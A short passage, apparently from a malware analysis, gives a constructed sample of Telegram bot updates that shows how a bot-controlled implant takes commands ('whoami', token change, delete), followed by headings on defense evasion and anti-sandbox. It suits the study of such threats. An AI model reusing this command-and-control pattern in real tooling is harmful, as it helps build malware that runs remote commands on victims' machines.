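# Constructed capture (hypothetical Bot ID and token placeholder, not real data).
SAMPLE = json.dumps({"ok": True, "result": [
    {"update_id": 1, "message": {"chat": {"id": CHAT_ID}, "text": "/start"}},
    {"update_id": 2, "message": {"chat": {"id": CHAT_ID}, "text": "/com12345678 whoami"}},
    {"update_id": 3, "message": {"chat": {"id": CHAT_ID}, "text": "/com12345678 change token EXAMPLE_TOKEN"}},
    {"update_id": 4, "message": {"chat": {"id": 42}, "text": "/com12345678 delete"}},
]})
```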



Defense Evasion 



Anti-Sandbox 


Let's not argue. Let's network!